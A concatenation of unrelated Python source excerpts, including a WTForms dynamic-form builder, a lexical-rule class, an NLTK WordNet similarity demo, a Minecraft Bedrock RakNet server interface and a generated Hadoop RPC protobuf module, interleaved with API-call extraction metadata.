                    Extension(config['attach_extensions']))
                field = DynamicFileField(**kwargs)
            elif isinstance(value, list):
                # Explicit choice list -> select field with an enum reader.
                choices = [
                    str(ele).strip().strip('"').strip("'")
                    for ele in value
                ]
                post_process = EnumReader(value, choices)
                if default is None and not required:
                    choices = ['NULL'] + choices
                kwargs['choices'] = [(ele, ele) for ele in choices]
                field = SelectField(**kwargs)
            else:
                raise LorisError(
                    f"field value {value} not accepted for {key}."
                )
        elif loc is not None and value == 'database':
            if not isinstance(loc, list) or not len(loc) == 2:
                raise LorisError(
                    f"If type '{value}' then loc must be of type "
                    "list with exactly two elements: "
                    "1. the database table class. "
                    "2. the columns to fetch for selected entry (str or list)."
                )
            # get table from database table class name
            table = config.get_table_from_classname(loc[0])
            columns = loc[1]
            # check that the requested columns exist in the table heading
            if isinstance(columns, str) and columns not in table.heading:
                raise LorisError(
                    f"Column '{columns}' not in table "
                    f"{table.full_table_name}; cannot create field {key}."
                )
            elif (
                not isinstance(columns, str)
                and (set(columns) - set(table.heading))
            ):
                raise LorisError(
                    f"Columns '{set(columns) - set(table.heading)}' not "
                    f"in table {table.full_table_name}; "
                    f"cannot create field {key}."
                )
            post_process = DbReader(table, columns)
            # create choices from the table's primary-key projection
            choices = table.proj().fetch()
            choices = [
                (str(ele), str(ele))
                if len(ele) > 1
                else (str(ele), str(ele[0]))
                for ele in choices
            ]
            choices = sorted(choices)
            if default is None and not required:
                choices = [('NULL', 'NULL')] + choices
            kwargs['choices'] = choices
            field = SelectField(**kwargs)
        elif loc is not None and isinstance(value, str):
            # File chosen from a folder inside the autoscript directory tree.
            loc = secure_filename(loc)
            locpath = os.path.join(folderpath, loc)
            # try up to three base directories down
            if not os.path.exists(locpath):
                # try main autoscript folder
                locpath = os.path.join(os.path.dirname(folderpath), loc)
                if not os.path.exists(locpath):
                    locpath = os.path.join(
                        os.path.dirname(os.path.dirname(folderpath)), loc
                    )
                    if not os.path.exists(locpath):
                        raise LorisError(
                            f'Folder "{loc}" does not exist in '
                            f'autoscript folder '
                            f'"{os.path.basename(folderpath)}" '
                            f'and also not in the main autoscript folder.'
                        )
            # get all files from folder
            files = glob.glob(os.path.join(locpath, '*'))
            # only keep extensions that the chosen reader can load
            if (value == 'pandas.DataFrame') or (value == 'numpy.recarray'):
                files = [
                    ifile for ifile in files
                    if (
                        ifile.endswith('.pkl')
                        or ifile.endswith('.npy')
                        or ifile.endswith('.csv')
                        or ifile.endswith('.json')
                    )
                ]
            elif value == 'numpy.array':
                files = [
                    ifile for ifile in files
                    if (
                        ifile.endswith('.pkl')
                        or ifile.endswith('.npy')
                        or ifile.endswith('.csv')
                    )
                ]
            elif (value == 'json') or (value == 'pandas.Series'):
                files = [ifile for ifile in files if ifile.endswith('.json')]
            else:
                # skip files that start with two underscores e.g. __init__.py
                files = [
                    ifile
                    for ifile in files
                    if not os.path.basename(ifile).startswith('__')
                ]
            # choices show the bare filename but submit the full path
            choices = [
                (str(ele), os.path.split(ele)[-1])
                for ele in files
            ]
            if default is None and not required:
                choices = [('NULL', 'NULL')] + choices
            kwargs['choices'] = choices
            post_process = cls.file_processing(value)
            field = SelectField(**kwargs)
        elif isinstance(value, dict):
            # Nested description -> embedded sub-form.
            form, post_process = dynamic_autoscripted_form(
                value, folderpath, NoCsrfForm
            )
            field = FormField(form)
            # TODO set number of fieldlists (startswith numeric)
        else:
            raise LorisError(f"field value {value} not accepted for {key}.")

        # Wrap in a FieldList so the user can add multiple values.
        if iterate:
            field = FieldList(
                field,
                min_entries=int(required) + 1  # have one required field if so
            )
            post_process = ListReader(post_process)

        return field, post_process
def dynamic_autoscripted_form(dictionary, folderpath, formclass=Form):
    """Build a WTForms class (plus value post-processors) from a config dict.

    Every entry of ``dictionary`` becomes one attribute on a freshly created
    form class derived from ``formclass`` and :class:`FormMixin`. Keys that
    start with ``#`` are treated as comments and skipped.

    Returns
    -------
    tuple
        The new form class and a :class:`DictReader` that post-processes
        submitted values field by field.
    """
    class DynamicForm(formclass, FormMixin):
        pass

    processors = {}
    for field_name, field_spec in dictionary.items():
        # Keys beginning with '#' are comments/formatting hints, not fields.
        if field_name.startswith('#'):
            continue
        # Field names become keyword arguments later on, so they must be
        # valid Python identifiers.
        if not field_name.isidentifier():
            raise LorisError(
                f"key {field_name} is not an identifier; i.e. alphanumeric "
                "and underscore characters only. The key needs to be "
                "an identifier if it is used as a keyword during function "
                "calling."
            )
        generated = AutoscriptedField(field_name, field_spec, folderpath)
        processors[field_name] = generated.post_process
        setattr(DynamicForm, field_name, generated.field)

    return DynamicForm, DictReader(processors)
| [
"werkzeug.utils.secure_filename",
"wtforms.validators.Optional",
"wtforms.FormField",
"os.path.exists",
"loris.app.autoscripting.utils.DbReader",
"wtforms.StringField",
"os.path.split",
"loris.config.get_table_from_classname",
"loris.errors.LorisError",
"wtforms.FloatField",
"loris.app.forms.for... | [((12748, 12777), 'loris.app.autoscripting.utils.DictReader', 'DictReader', (['post_process_dict'], {}), '(post_process_dict)\n', (12758, 12777), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((11772, 11796), 'loris.app.autoscripting.utils.ListReader', 'ListReader', (['post_process'], {}), '(post_process)\n', (11782, 11796), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((12210, 12402), 'loris.errors.LorisError', 'LorisError', (['f"""key {key} is not an identifier; i.e. alphanumeric and underscore characters only. The key needs to be an identifier if it is used as a keyword during function calling."""'], {}), "(\n f'key {key} is not an identifier; i.e. alphanumeric and underscore characters only. 
The key needs to be an identifier if it is used as a keyword during function calling.'\n )\n", (12220, 12402), False, 'from loris.errors import LorisError\n'), ((4007, 4026), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4016, 4026), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((7267, 7306), 'loris.config.get_table_from_classname', 'config.get_table_from_classname', (['loc[0]'], {}), '(loc[0])\n', (7298, 7306), False, 'from loris import config\n'), ((8019, 8043), 'loris.app.autoscripting.utils.DbReader', 'DbReader', (['table', 'columns'], {}), '(table, columns)\n', (8027, 8043), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((8507, 8528), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (8518, 8528), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((1463, 1553), 'loris.errors.LorisError', 'LorisError', (['f"""Key in dynamic auto-generated form contains illegal keywords: {truth}."""'], {}), "(\n f'Key in dynamic auto-generated form contains illegal keywords: {truth}.')\n", (1473, 1553), False, 'from loris.errors import LorisError\n'), ((3430, 3445), 'wtforms.validators.InputRequired', 'InputRequired', ([], {}), '()\n', (3443, 3445), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((3579, 3589), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (3587, 3589), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((3950, 3981), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', 
(3975, 3981), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4162, 4181), 'loris.app.forms.formmixin.DictField', 'DictField', ([], {}), '(**kwargs)\n', (4171, 4181), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6908, 7094), 'loris.errors.LorisError', 'LorisError', (['f"""If type \'{value}\' then loc must be of type list with exactly two elements: 1. the database table class. 2. the columns to fetch for selected entry (str or list)."""'], {}), '(\n f"If type \'{value}\' then loc must be of type list with exactly two elements: 1. the database table class. 2. the columns to fetch for selected entry (str or list)."\n )\n', (6918, 7094), False, 'from loris.errors import LorisError\n'), ((7461, 7569), 'loris.errors.LorisError', 'LorisError', (['f"""Column \'{columns}\' not in table {table.full_table_name}; cannot create field {key}."""'], {}), '(\n f"Column \'{columns}\' not in table {table.full_table_name}; cannot create field {key}."\n )\n', (7471, 7569), False, 'from loris.errors import LorisError\n'), ((8604, 8624), 'werkzeug.utils.secure_filename', 'secure_filename', (['loc'], {}), '(loc)\n', (8619, 8624), False, 'from werkzeug.utils import secure_filename\n'), ((8647, 8676), 'os.path.join', 'os.path.join', (['folderpath', 'loc'], {}), '(folderpath, loc)\n', (8659, 8676), False, 'import os\n'), ((11150, 11171), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (11161, 11171), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((4105, 4136), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['dict'], {}), '(dict)\n', (4130, 4136), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, 
JsonSerializableValidator, Extension, FormMixin\n'), ((4239, 4260), 'wtforms.StringField', 'StringField', ([], {}), '(**kwargs)\n', (4250, 4260), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((8748, 8771), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (8762, 8771), False, 'import os\n'), ((9524, 9550), 'os.path.join', 'os.path.join', (['locpath', '"""*"""'], {}), "(locpath, '*')\n", (9536, 9550), False, 'import os\n'), ((11350, 11365), 'wtforms.FormField', 'FormField', (['form'], {}), '(form)\n', (11359, 11365), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((11459, 11517), 'loris.errors.LorisError', 'LorisError', (['f"""field value {value} not accepted for {key}."""'], {}), "(f'field value {value} not accepted for {key}.')\n", (11469, 11517), False, 'from loris.errors import LorisError\n'), ((4430, 4449), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4439, 4449), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((8857, 8884), 'os.path.dirname', 'os.path.dirname', (['folderpath'], {}), '(folderpath)\n', (8872, 8884), False, 'import os\n'), ((8914, 8937), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (8928, 8937), False, 'import os\n'), ((4338, 4369), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', (4363, 4369), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4623, 4642), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4632, 4642), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, 
ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((9106, 9129), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (9120, 9129), False, 'import os\n'), ((10829, 10847), 'os.path.split', 'os.path.split', (['ele'], {}), '(ele)\n', (10842, 10847), False, 'import os\n'), ((4529, 4560), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', (4554, 4560), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4700, 4722), 'wtforms.IntegerField', 'IntegerField', ([], {}), '(**kwargs)\n', (4712, 4722), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((9023, 9050), 'os.path.dirname', 'os.path.dirname', (['folderpath'], {}), '(folderpath)\n', (9038, 9050), False, 'import os\n'), ((4782, 4802), 'wtforms.FloatField', 'FloatField', ([], {}), '(**kwargs)\n', (4792, 4802), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((4913, 4935), 'wtforms.BooleanField', 'BooleanField', ([], {}), '(**kwargs)\n', (4925, 4935), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((9320, 9348), 'os.path.basename', 'os.path.basename', (['folderpath'], {}), '(folderpath)\n', (9336, 9348), False, 'import os\n'), ((4877, 4887), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (4885, 4887), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((5116, 5142), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5132, 5142), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, 
JsonSerializableValidator, Extension, FormMixin\n'), ((5021, 5032), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5030, 5032), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5326, 5352), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5342, 5352), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((10688, 10711), 'os.path.basename', 'os.path.basename', (['ifile'], {}), '(ifile)\n', (10704, 10711), False, 'import os\n'), ((5231, 5242), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5240, 5242), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5538, 5564), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5554, 5564), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5443, 5454), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5452, 5454), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5747, 5773), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5763, 5773), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5652, 5663), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5661, 5663), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5955, 5981), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], 
{}), '(**kwargs)\n', (5971, 5981), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5852, 5871), 'loris.app.forms.formmixin.Extension', 'Extension', (["['json']"], {}), "(['json'])\n", (5861, 5871), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6145, 6171), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (6161, 6171), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6081, 6119), 'loris.app.forms.formmixin.Extension', 'Extension', (["config['attach_extensions']"], {}), "(config['attach_extensions'])\n", (6090, 6119), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6387, 6413), 'loris.app.autoscripting.utils.EnumReader', 'EnumReader', (['value', 'choices'], {}), '(value, choices)\n', (6397, 6413), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((6610, 6631), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (6621, 6631), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((6672, 6730), 'loris.errors.LorisError', 'LorisError', (['f"""field value {value} not accepted for {key}."""'], {}), "(f'field value {value} not accepted for {key}.')\n", (6682, 6730), False, 'from loris.errors import LorisError\n')] |
import copy
from .reduplication import RegexTest
from .common_functions import check_for_regex
class LexRule:
    """
    A regex-based second order lexical rule.

    Such rules run after the primary morphological analysis has finished:
    whenever a word's analysis matches all of the rule's search conditions,
    the fields listed under "add" are appended to that word. Every rule has
    to name either a lemma or a stem it applies to.
    """

    def __init__(self, g, dictRule, errorHandler=None):
        self.g = g
        self.errorHandler = errorHandler
        self.rxWhat = None
        self.stem = None
        self.lemma = None
        self.searchFields = []
        self.addFields = []
        # Dispatch each top-level section of the rule to its handler.
        handlers = {
            'search': self.process_search,
            'add': self.process_add,
        }
        for section in dictRule['content']:
            handler = handlers.get(section['name'])
            if handler is None:
                self.raise_error('Unrecognized field in a lexical rule description: ',
                                 section)
            else:
                handler(section['content'])

    def raise_error(self, message, data=None):
        # Delegate to the shared error handler when one was supplied;
        # otherwise errors are silently ignored.
        if self.errorHandler is not None:
            self.errorHandler.RaiseError(message, data)

    def apply(self, wf):
        """Return an enriched copy of *wf* if the rule matches, else None."""
        if wf.stem != self.stem and wf.lemma != self.lemma:
            return None
        matchesAll = all(
            check_for_regex(wf, rxTest, errorHandler=self.errorHandler,
                            checkWordform=True)
            for rxTest in self.searchFields
        )
        if not matchesAll:
            return None
        enriched = copy.deepcopy(wf)
        enriched.otherData += self.addFields
        return enriched

    def process_search(self, dictRules):
        """Store the rule's search conditions (lemma, stem and regex tests)."""
        for condition in dictRules:
            fieldName = condition['name']
            fieldValue = condition['value']
            if type(fieldValue) != str:
                self.raise_error('Wrong field in a lexical rule.', fieldValue)
                continue
            if fieldName == 'lex':
                self.lemma = fieldValue
            elif fieldName == 'stem':
                self.stem = fieldValue
            else:
                self.searchFields.append(
                    RegexTest(fieldName, fieldValue,
                              errorHandler=self.errorHandler))

    def process_add(self, dictRules):
        """Remember the (field, value) pairs to add to matching words."""
        self.addFields.extend((rule['name'], rule['value'])
                              for rule in dictRules)
| [
"copy.deepcopy"
] | [((1584, 1601), 'copy.deepcopy', 'copy.deepcopy', (['wf'], {}), '(wf)\n', (1597, 1601), False, 'import copy\n')] |
# Demo: compare information-content (IC) based WordNet similarity measures
# (Resnik, Jiang-Conrath and Lin) under different IC sources.
import nltk
from nltk.corpus import wordnet
from nltk.corpus import wordnet as wn
from nltk.corpus import wordnet_ic
# Pre-computed information content from the Brown and SemCor corpora.
brown_ic = wordnet_ic.ic('ic-brown.dat')
semcor_ic = wordnet_ic.ic('ic-semcor.dat')
from nltk.corpus import genesis
# Information content computed on the fly from the Genesis corpus.
genesis_ic = wn.ic(genesis, False, 0.0)
first_synset = wn.synset('lion.n.01')
second_synset = wn.synset('cat.n.01')
# Same five comparisons as before, in the same order.
comparisons = (
    ('res_similarity', brown_ic),
    ('res_similarity', genesis_ic),
    ('jcn_similarity', brown_ic),
    ('jcn_similarity', genesis_ic),
    ('lin_similarity', semcor_ic),
)
for measure, corpus_ic in comparisons:
    print(getattr(first_synset, measure)(second_synset, corpus_ic))
| [
"nltk.corpus.wordnet_ic.ic",
"nltk.corpus.wordnet.synset",
"nltk.corpus.wordnet.ic"
] | [((128, 157), 'nltk.corpus.wordnet_ic.ic', 'wordnet_ic.ic', (['"""ic-brown.dat"""'], {}), "('ic-brown.dat')\n", (141, 157), False, 'from nltk.corpus import wordnet_ic\n'), ((170, 200), 'nltk.corpus.wordnet_ic.ic', 'wordnet_ic.ic', (['"""ic-semcor.dat"""'], {}), "('ic-semcor.dat')\n", (183, 200), False, 'from nltk.corpus import wordnet_ic\n'), ((246, 272), 'nltk.corpus.wordnet.ic', 'wn.ic', (['genesis', '(False)', '(0.0)'], {}), '(genesis, False, 0.0)\n', (251, 272), True, 'from nltk.corpus import wordnet as wn\n'), ((280, 302), 'nltk.corpus.wordnet.synset', 'wn.synset', (['"""lion.n.01"""'], {}), "('lion.n.01')\n", (289, 302), True, 'from nltk.corpus import wordnet as wn\n'), ((309, 330), 'nltk.corpus.wordnet.synset', 'wn.synset', (['"""cat.n.01"""'], {}), "('cat.n.01')\n", (318, 330), True, 'from nltk.corpus import wordnet as wn\n')] |
################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 <NAME> #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
from constant.version import version
from packet.mcbe.game_packet import game_packet
from player.bedrock_player import bedrock_player
from rak_net.server import server as rak_net_server
from threading import Thread
class rak_net_interface(Thread):
    """Bridges the RakNet transport to the Bedrock game server.

    Runs as a thread that pumps the underlying RakNet server loop and
    translates its connection/frame callbacks into player lifecycle
    events and decoded game packets. The advertised status string has
    the shape ``MCPE;<motd>;<proto>;<version>;<count>;<max>;0;``.
    """

    def __init__(self, server: object) -> None:
        super().__init__()
        self.server: object = server
        address = server.config.data["ip_address"]
        self.rak_net_server: object = rak_net_server(address["hostname"], address["port"])
        # Register ourselves so RakNet can deliver callbacks.
        self.rak_net_server.interface = self
        self.set_status(server.config.data["motd"], 0, server.config.data["max_players"])

    def get_count(self) -> int:
        """Current player count parsed from the status string."""
        return int(self.rak_net_server.name.split(";")[4])

    def get_max_count(self) -> int:
        """Maximum player count parsed from the status string."""
        return int(self.rak_net_server.name.split(";")[5])

    def get_motd(self) -> str:
        """Message of the day parsed from the status string."""
        return self.rak_net_server.name.split(";")[1]

    def set_status(self, motd: str, count: int, max_count: int) -> None:
        """Rebuild the MCPE status string shown in the server list."""
        self.rak_net_server.name: str = f"MCPE;{motd};{version.mcbe_protocol_version};{version.mcbe_version};{count};{max_count};0;"

    def set_motd(self, motd: str) -> None:
        self.set_status(motd, self.get_count(), self.get_max_count())

    def set_count(self, count: int) -> None:
        self.set_status(self.get_motd(), count, self.get_max_count())

    def set_max_count(self, max_count: int) -> None:
        self.set_status(self.get_motd(), self.get_count(), max_count)

    def on_frame(self, packet: object, connection: object) -> None:
        """Unwrap a 0xfe game packet and feed its batches to the player."""
        token = connection.address.token
        if token not in self.server.players:
            return
        if packet.body[0] != 0xfe:
            return
        wrapper: object = game_packet(packet.body)
        wrapper.decode()
        for batch in wrapper.read_packets_data():
            print(f'[Packet]: {hex(batch[0])}')
            self.server.players[token].handle_packet(batch)

    def on_new_incoming_connection(self, connection: object) -> None:
        """Create a player for a freshly established connection."""
        token = connection.address.token
        player = bedrock_player(connection, self.server)
        player.entity_id = self.server.current_entity_id
        self.server.players[token] = player
        self.server.current_entity_id += 1
        self.set_count(len(self.server.players))
        self.server.logger.info(f"{token} connected.")

    def on_disconnect(self, connection: object) -> None:
        """Drop the player associated with a closed connection."""
        token = connection.address.token
        del self.server.players[token]
        self.set_count(len(self.server.players))
        self.server.logger.info(f"{token} disconnected.")

    def start_interface(self) -> None:
        """Start pumping the RakNet server on this thread."""
        self.stopped: bool = False
        self.start()

    def stop_interface(self) -> None:
        """Ask the pump loop to exit."""
        self.stopped: bool = True

    def run(self):
        # Pump RakNet until stop_interface() flips the flag.
        while not self.stopped:
            self.rak_net_server.handle()
| [
"rak_net.server.server",
"player.bedrock_player.bedrock_player",
"packet.mcbe.game_packet.game_packet"
] | [((2822, 2929), 'rak_net.server.server', 'rak_net_server', (["server.config.data['ip_address']['hostname']", "server.config.data['ip_address']['port']"], {}), "(server.config.data['ip_address']['hostname'], server.config.\n data['ip_address']['port'])\n", (2836, 2929), True, 'from rak_net.server import server as rak_net_server\n'), ((4635, 4674), 'player.bedrock_player.bedrock_player', 'bedrock_player', (['connection', 'self.server'], {}), '(connection, self.server)\n', (4649, 4674), False, 'from player.bedrock_player import bedrock_player\n'), ((4183, 4207), 'packet.mcbe.game_packet.game_packet', 'game_packet', (['packet.body'], {}), '(packet.body)\n', (4194, 4207), False, 'from packet.mcbe.game_packet import game_packet\n')] |
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
# NOTE: protoc-generated module for RpcPayloadHeader.proto ("DO NOT EDIT").
# The descriptor constants below mirror the .proto; regenerate rather than
# hand-editing them. serialized_pb is the wire-encoded FileDescriptorProto.
DESCRIPTOR = descriptor.FileDescriptor(
  name='RpcPayloadHeader.proto',
  package='',
  serialized_pb='\n\x16RpcPayloadHeader.proto\"q\n\x15RpcPayloadHeaderProto\x12\x1e\n\x07rpcKind\x18\x01 \x01(\x0e\x32\r.RpcKindProto\x12(\n\x05rpcOp\x18\x02 \x01(\x0e\x32\x19.RpcPayloadOperationProto\x12\x0e\n\x06\x63\x61llId\x18\x03 \x02(\r\"f\n\x16RpcResponseHeaderProto\x12\x0e\n\x06\x63\x61llId\x18\x01 \x02(\r\x12\x1f\n\x06status\x18\x02 \x02(\x0e\x32\x0f.RpcStatusProto\x12\x1b\n\x13serverIpcVersionNum\x18\x03 \x01(\r*J\n\x0cRpcKindProto\x12\x0f\n\x0bRPC_BUILTIN\x10\x00\x12\x10\n\x0cRPC_WRITABLE\x10\x01\x12\x17\n\x13RPC_PROTOCOL_BUFFER\x10\x02*i\n\x18RpcPayloadOperationProto\x12\x15\n\x11RPC_FINAL_PAYLOAD\x10\x00\x12\x1c\n\x18RPC_CONTINUATION_PAYLOAD\x10\x01\x12\x18\n\x14RPC_CLOSE_CONNECTION\x10\x02*3\n\x0eRpcStatusProto\x12\x0b\n\x07SUCCESS\x10\x00\x12\t\n\x05\x45RROR\x10\x01\x12\t\n\x05\x46\x41TAL\x10\x02\x42;\n\x1eorg.apache.hadoop.ipc.protobufB\x16RpcPayloadHeaderProtos\xa0\x01\x01')
# Enum descriptor: which serialization engine produced the RPC payload.
_RPCKINDPROTO = descriptor.EnumDescriptor(
  name='RpcKindProto',
  full_name='RpcKindProto',
  filename=None,
  file=DESCRIPTOR,
  values=[
    descriptor.EnumValueDescriptor(
      name='RPC_BUILTIN', index=0, number=0,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='RPC_WRITABLE', index=1, number=1,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='RPC_PROTOCOL_BUFFER', index=2, number=2,
      options=None,
      type=None),
  ],
  containing_type=None,
  options=None,
  serialized_start=245,
  serialized_end=319,
)
# Enum descriptor: whether this payload is final, a continuation, or a close.
_RPCPAYLOADOPERATIONPROTO = descriptor.EnumDescriptor(
  name='RpcPayloadOperationProto',
  full_name='RpcPayloadOperationProto',
  filename=None,
  file=DESCRIPTOR,
  values=[
    descriptor.EnumValueDescriptor(
      name='RPC_FINAL_PAYLOAD', index=0, number=0,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='RPC_CONTINUATION_PAYLOAD', index=1, number=1,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='RPC_CLOSE_CONNECTION', index=2, number=2,
      options=None,
      type=None),
  ],
  containing_type=None,
  options=None,
  serialized_start=321,
  serialized_end=426,
)
# Enum descriptor: outcome status carried in the RPC response header.
_RPCSTATUSPROTO = descriptor.EnumDescriptor(
  name='RpcStatusProto',
  full_name='RpcStatusProto',
  filename=None,
  file=DESCRIPTOR,
  values=[
    descriptor.EnumValueDescriptor(
      name='SUCCESS', index=0, number=0,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='ERROR', index=1, number=1,
      options=None,
      type=None),
    descriptor.EnumValueDescriptor(
      name='FATAL', index=2, number=2,
      options=None,
      type=None),
  ],
  containing_type=None,
  options=None,
  serialized_start=428,
  serialized_end=479,
)
# Module-level aliases for the enum values (mirrors the generated descriptors).
RPC_BUILTIN = 0
RPC_WRITABLE = 1
RPC_PROTOCOL_BUFFER = 2
RPC_FINAL_PAYLOAD = 0
RPC_CONTINUATION_PAYLOAD = 1
RPC_CLOSE_CONNECTION = 2
SUCCESS = 0
ERROR = 1
FATAL = 2
# Message descriptor: header sent with each RPC request payload.
_RPCPAYLOADHEADERPROTO = descriptor.Descriptor(
  name='RpcPayloadHeaderProto',
  full_name='RpcPayloadHeaderProto',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
